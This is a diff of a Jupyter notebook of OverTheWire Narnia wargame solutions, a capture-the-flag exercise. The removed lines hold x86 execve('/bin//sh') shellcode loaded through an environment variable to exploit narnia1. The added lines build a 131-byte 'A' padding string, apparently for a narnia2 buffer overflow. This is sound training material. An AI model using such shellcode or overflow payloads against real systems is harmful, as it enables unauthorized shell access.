--- a/Narnia/narnia.ipynb
+++ b/Narnia/narnia.ipynb
@@ -23,22 +23,27 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## narnia1\n"
+    "## narnia2\n"
    ]
   },
   {
    "cell_type": "code",
-   "execution_count": null,
+   "execution_count": 2,
    "metadata": {},
-   "outputs": [],
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
    "source": [
-    "import os\n",
-    "\n",
-    "# shellcode\n",
-    "shellcode = b\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\"\n",
-    "\n",
-    "os.environ[\"EGG\"] = shellcode\n",
-    "exec(\"/narnia/narnia1\")"
+    "\"A\" * 131"
    ]
   }
  ],
